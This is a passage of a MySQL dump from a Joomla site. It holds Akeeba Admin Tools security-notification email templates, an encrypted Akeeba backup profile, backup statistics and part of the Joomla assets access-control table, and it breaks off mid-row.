LOCK TABLES `atlyh_admintools_wafexceptions` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_wafexceptions` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_admintools_wafexceptions` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_admintools_waftemplates`
--
DROP TABLE IF EXISTS `atlyh_admintools_waftemplates`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_admintools_waftemplates` (
`admintools_waftemplate_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`reason` varchar(255) NOT NULL,
`language` varchar(10) NOT NULL DEFAULT '*',
`subject` varchar(255) NOT NULL,
`template` text NOT NULL,
`enabled` tinyint(3) NOT NULL DEFAULT 1,
`email_num` tinyint(3) unsigned NOT NULL,
`email_numfreq` tinyint(3) unsigned NOT NULL,
`email_freq` enum('','second','minute','hour','day') NOT NULL DEFAULT '',
`created_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` bigint(20) NOT NULL DEFAULT 0,
`modified_on` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`admintools_waftemplate_id`),
UNIQUE KEY `admintools_waftemplate_keylang` (`reason`,`language`)
) ENGINE=InnoDB AUTO_INCREMENT=6 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_admintools_waftemplates`
--
LOCK TABLES `atlyh_admintools_waftemplates` WRITE;
/*!40000 ALTER TABLE `atlyh_admintools_waftemplates` DISABLE KEYS */;
INSERT INTO `atlyh_admintools_waftemplates` VALUES (1,'all','*','Security exception on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>We would like to notify you that a security exception was detected on your site, [SITENAME], with the following details:</p>\r\n<p>IP Address: [IP] (IP Lookup: [LOOKUP])<br />Reason: [REASON]</p>\r\n<p>If this kind of security exception repeats itself, please log in to your site\'s back-end and add this IP address to your Admin Tools\'s Web Application Firewall feature in order to completely block the misbehaving user.</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2014-04-14 14:36:34',800,'2014-04-14 14:42:38',800),(2,'user-reactivate','*','User deactivated on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>on [DATE] the user account [USER] was de-activated because too many failed logins were detected coming from IP address: [IP].</p>\r\n<p>Please click on the following link to activate the user account again:<br />[ACTIVATE]</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,0,0,'','2014-04-24 14:44:49',800,'0000-00-00 00:00:00',0),(3,'adminloginfail','*','Failed administrator login for user [USER] on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p>Hello,</p>\r\n<p>We would like to notify you that user <strong>[USER]</strong> did <strong>not</strong> log in successfully to the administrator back-end area of your site, [SITENAME]. <span style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Further information:</span></p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Username: [USER]<br />IP address: [IP] ([LOOKUP])<br />Country*: [COUNTRY]<br />Continent*: [CONTINENT]<br />Browser User Agent string: [UA]</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">* Country and continent information availability and accuracy depend on the GeoIP database installed on your site.</p>\r\n<p>If this expected you need to do nothing about it. If you suspect a hacking attempt, please log in to your site\'s back-end immediately and activate Admin Tools\' Emergency Off-Line mode at once.</p>\r\n<p>Best regards,</p>\r\n<p>The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2015-07-27 13:52:45',800,'2015-07-27 13:58:31',800),(4,'adminloginsuccess','*','User [USER] logged in on [SITENAME] administrator area','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Hello,</p>\r\n<p>We would like to notify you that user [USER] has just logged in to the administrator back-end area of your site, [SITENAME]. Further information:</p>\r\n<p>Username: [USER]<br />IP address: [IP] ([LOOKUP])<br />Country*: [COUNTRY]<br />Continent*: [CONTINENT]<br />Browser User Agent string: [UA]</p>\r\n<p>* Country and continent information availability and accuracy depend on the GeoIP database installed on your site.</p>\r\n<p>If this expected you need to do nothing about it. If you suspect a hacking attempt, please log in to your site\'s back-end immediately and activate Admin Tools\' Emergency Off-Line mode at once.</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Best regards,</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2015-07-27 13:58:08',800,'0000-00-00 00:00:00',0),(5,'ipautoban','*','Automatic IP blocking notification for [IP] on [SITENAME]','<div style=\"background-color: #e0e0e0; padding: 10px 20px;\">\r\n<div style=\"background-color: #f9f9f9; border-radius: 10px; padding: 5px 10px;\">\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Hello,</p>\r\n<p>We would like to notify you that the IP address [IP] is now blocked from accessing your site, [SITENAME]<span style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">, with the following details:</span></p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">IP Address: [IP] (IP Lookup: [LOOKUP])<br />Reason: [REASON]<br />Banned until: [UNTIL]</p>\r\n<p>If this is your own IP address and you can no longer access your site please <a href=\"http://akee.ba/lockedout\">follow our instructions</a> to temporarily disable Admin Tools\' Web Application Firewall and clear the automatic IP ban.</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">Best regards,</p>\r\n<p style=\"font-size: 12.1599998474121px; line-height: 15.8079996109009px;\">The [SITENAME] team</p>\r\n</div>\r\n<p style=\"font-size: x-small; color: #667;\">You are receiving this automatic email message because you are an administrator in <em>[SITENAME]</em>. <span style=\"line-height: 1.3em;\">Do not reply to this email, it\'s sent from an unmonitored email address.</span></p>\r\n</div>\r\n<p style=\"text-align: right; font-size: 7pt; color: #ccc;\">Powered by <a style=\"color: #ccf; text-decoration: none;\" href=\"https://www.akeebabackup.com/products/admin-tools.html\">Akeeba AdminTools</a></p>',1,5,1,'hour','2015-07-27 14:20:00',800,'0000-00-00 00:00:00',0);
/*!40000 ALTER TABLE `atlyh_admintools_waftemplates` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_ak_profiles`
--
DROP TABLE IF EXISTS `atlyh_ak_profiles`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_ak_profiles` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`description` varchar(255) NOT NULL,
`configuration` longtext DEFAULT NULL,
`filters` longtext DEFAULT NULL,
`quickicon` tinyint(3) NOT NULL DEFAULT 1,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_ak_profiles`
--
LOCK TABLES `atlyh_ak_profiles` WRITE;
/*!40000 ALTER TABLE `atlyh_ak_profiles` DISABLE KEYS */;
INSERT INTO `atlyh_ak_profiles` VALUES (1,'Default Backup Profile','###AES128###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','',1);
/*!40000 ALTER TABLE `atlyh_ak_profiles` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_ak_stats`
--
DROP TABLE IF EXISTS `atlyh_ak_stats`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_ak_stats` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`description` varchar(255) NOT NULL,
`comment` longtext DEFAULT NULL,
`backupstart` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`backupend` timestamp NOT NULL DEFAULT '0000-00-00 00:00:00',
`status` enum('run','fail','complete') NOT NULL DEFAULT 'run',
`origin` varchar(30) NOT NULL DEFAULT 'backend',
`type` varchar(30) NOT NULL DEFAULT 'full',
`profile_id` bigint(20) NOT NULL DEFAULT 1,
`archivename` longtext DEFAULT NULL,
`absolute_path` longtext DEFAULT NULL,
`multipart` int(11) NOT NULL DEFAULT 0,
`tag` varchar(255) DEFAULT NULL,
`backupid` varchar(255) DEFAULT NULL,
`filesexist` tinyint(3) NOT NULL DEFAULT 1,
`remote_filename` varchar(1000) DEFAULT NULL,
`total_size` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `idx_fullstatus` (`filesexist`,`status`),
KEY `idx_stale` (`status`,`origin`)
) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_ak_stats`
--
LOCK TABLES `atlyh_ak_stats` WRITE;
/*!40000 ALTER TABLE `atlyh_ak_stats` DISABLE KEYS */;
INSERT INTO `atlyh_ak_stats` VALUES (10,'Backup taken on Saturday, 27 February 2016 09:36','','2016-02-27 07:36:39','2016-02-27 07:37:06','complete','backend','full',1,'site-localhost-20160227-093639.jpa','/Applications/MAMP/htdocs/helix3/administrator/components/com_akeeba/backup/site-localhost-20160227-093639.jpa',1,'backend','id10',1,NULL,20323539),(11,'Backup taken on Sunday, 28 February 2016 11:53','','2016-02-28 09:53:51','2016-02-28 09:54:16','complete','backend','full',1,'site-localhost-20160228-115351.jpa','/Applications/MAMP/htdocs/helix3/administrator/components/com_akeeba/backup/site-localhost-20160228-115351.jpa',1,'backend','id11',1,NULL,23597485),(12,'Backup taken on Tuesday, 01 March 2016 10:06','','2016-03-01 08:07:02','2016-03-01 08:07:28','complete','backend','full',1,'site-localhost-20160301-100702.jpa','/Applications/MAMP/htdocs/helix3/administrator/components/com_akeeba/backup/site-localhost-20160301-100702.jpa',1,'backend','id12',1,NULL,23919469);
/*!40000 ALTER TABLE `atlyh_ak_stats` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_ak_storage`
--
DROP TABLE IF EXISTS `atlyh_ak_storage`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_ak_storage` (
`tag` varchar(255) NOT NULL,
`lastupdate` timestamp NOT NULL DEFAULT current_timestamp() ON UPDATE current_timestamp(),
`data` longtext DEFAULT NULL,
PRIMARY KEY (`tag`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_ak_storage`
--
LOCK TABLES `atlyh_ak_storage` WRITE;
/*!40000 ALTER TABLE `atlyh_ak_storage` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_ak_storage` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_akeeba_common`
--
DROP TABLE IF EXISTS `atlyh_akeeba_common`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_akeeba_common` (
`key` varchar(255) NOT NULL,
`value` longtext NOT NULL,
PRIMARY KEY (`key`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_akeeba_common`
--
LOCK TABLES `atlyh_akeeba_common` WRITE;
/*!40000 ALTER TABLE `atlyh_akeeba_common` DISABLE KEYS */;
/*!40000 ALTER TABLE `atlyh_akeeba_common` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_assets`
--
DROP TABLE IF EXISTS `atlyh_assets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_assets` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
`parent_id` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set parent.',
`lft` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set lft.',
`rgt` int(11) NOT NULL DEFAULT 0 COMMENT 'Nested set rgt.',
`level` int(10) unsigned NOT NULL COMMENT 'The cached level in the nested tree.',
`name` varchar(50) NOT NULL COMMENT 'The unique name for the asset.\n',
`title` varchar(100) NOT NULL COMMENT 'The descriptive title for the asset.',
`rules` varchar(5120) NOT NULL COMMENT 'JSON encoded access control.',
PRIMARY KEY (`id`),
UNIQUE KEY `idx_asset_name` (`name`),
KEY `idx_lft_rgt` (`lft`,`rgt`),
KEY `idx_parent_id` (`parent_id`)
) ENGINE=InnoDB AUTO_INCREMENT=245 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_assets`
--
LOCK TABLES `atlyh_assets` WRITE;
/*!40000 ALTER TABLE `atlyh_assets` DISABLE KEYS */;
INSERT INTO `atlyh_assets` VALUES (1,0,1,376,0,'root.1','Root Asset','{\"core.login.site\":{\"6\":1,\"2\":1},\"core.login.admin\":{\"6\":1},\"core.login.offline\":[],\"core.admin\":{\"8\":1},\"core.manage\":{\"7\":1},\"core.create\":{\"6\":1,\"3\":1},\"core.delete\":{\"6\":1},\"core.edit\":{\"6\":1,\"4\":1},\"core.edit.state\":{\"6\":1,\"5\":1},\"core.edit.own\":{\"6\":1,\"3\":1}}'),(2,1,2,3,1,'com_admin','com_admin','{}'),(3,1,4,11,1,'com_banners','com_banners','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(4,1,12,13,1,'com_cache','com_cache','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(5,1,14,15,1,'com_checkin','com_checkin','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(6,1,16,17,1,'com_config','com_config','{}'),(7,1,18,87,1,'com_contact','com_contact','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(8,1,88,195,1,'com_content','com_content','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":[],\"core.edit\":{\"4\":1},\"core.edit.state\":{\"5\":1},\"core.edit.own\":[]}'),(9,1,196,197,1,'com_cpanel','com_cpanel','{}'),(10,1,198,199,1,'com_installer','com_installer','{\"core.admin\":[],\"core.manage\":{\"7\":0},\"core.delete\":{\"7\":0},\"core.edit.state\":{\"7\":0}}'),(11,1,200,201,1,'com_languages','com_languages','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(12,1,202,203,1,'com_login','com_login','{}'),(13,1,204,205,1,'com_mailto','com_mailto','{}'),(14,1,206,207,1,'com_massmail','com_massmail','{}'),(15,1,208,209,1,'com_media','com_media','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":{\"3\":1},\"core.delete\":{\"5\":1},\"core.edit\":[],\"core.edit.state\":[]}'),(16,1,210,211,1,'com_menus','com_menus','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(17,1,37,38,1,'com_messages','com_messages','{\"core.admin\":{\"7\":1},\"core.manage\":{\"7\":1}}'),(18,1,214,261,1,'com_modules','com_modules','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(19,1,262,269,1,'com_newsfeeds','com_newsfeeds','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1},\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(20,1,270,271,1,'com_plugins','com_plugins','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(21,1,272,273,1,'com_redirect','com_redirect','{\"core.admin\":{\"7\":1},\"core.manage\":[]}'),(22,1,274,275,1,'com_search','com_search','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(23,1,276,277,1,'com_templates','com_templates','{\"core.admin\":{\"7\":1},\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(24,1,278,281,1,'com_users','com_users','{\"core.admin\":{\"7\":1},\"core.options\":[],\"core.manage\":[],\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(26,1,282,283,1,'com_wrapper','com_wrapper','{}'),(33,1,344,345,1,'com_finder','com_finder','{\"core.admin\":{\"7\":1},\"core.manage\":{\"6\":1}}'),(34,8,105,108,2,'com_content.category.9','Uncategorised','{\"core.create\":{\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(35,3,7,8,2,'com_banners.category.10','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(36,7,23,24,2,'com_contact.category.11','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(37,19,265,266,2,'com_newsfeeds.category.12','Uncategorised','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(40,3,9,10,2,'com_banners.category.15','Sample Data-Banners','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(41,7,25,86,2,'com_contact.category.16','Sample Data-Contact','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(42,19,267,268,2,'com_newsfeeds.category.17','Sample Data-Newsfeeds','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(44,8,111,152,2,'com_content.category.19','Joomla!','{\"core.create\":{\"10\":0,\"12\":0},\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(46,44,138,151,3,'com_content.category.21','Components','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[],\"core.edit.own\":[]}'),(59,41,26,27,3,'com_contact.category.34','Park Site','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(60,41,28,85,3,'com_contact.category.35','Shop Site','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(61,60,29,30,4,'com_contact.category.36','Staff','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(62,60,31,84,4,'com_contact.category.37','Fruit Encyclopedia','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(63,62,32,33,5,'com_contact.category.38','A','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(64,62,34,35,5,'com_contact.category.39','B','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(65,62,36,37,5,'com_contact.category.40','C','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(66,62,38,39,5,'com_contact.category.41','D','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(67,62,40,41,5,'com_contact.category.42','E','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(68,62,42,43,5,'com_contact.category.43','F','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(69,62,44,45,5,'com_contact.category.44','G','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(70,62,46,47,5,'com_contact.category.45','H','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(71,62,48,49,5,'com_contact.category.46','I','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(72,62,50,51,5,'com_contact.category.47','J','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(73,62,52,53,5,'com_contact.category.48','K','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(74,62,54,55,5,'com_contact.category.49','L','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(75,62,56,57,5,'com_contact.category.50','M','{\"core.create\":[],\"core.delete\":[],\"core.edit\":[],\"core.edit.state\":[]}'),(76,62,58,59,5,'com_contact.category.51','N','{\"core.create\":[],\"core.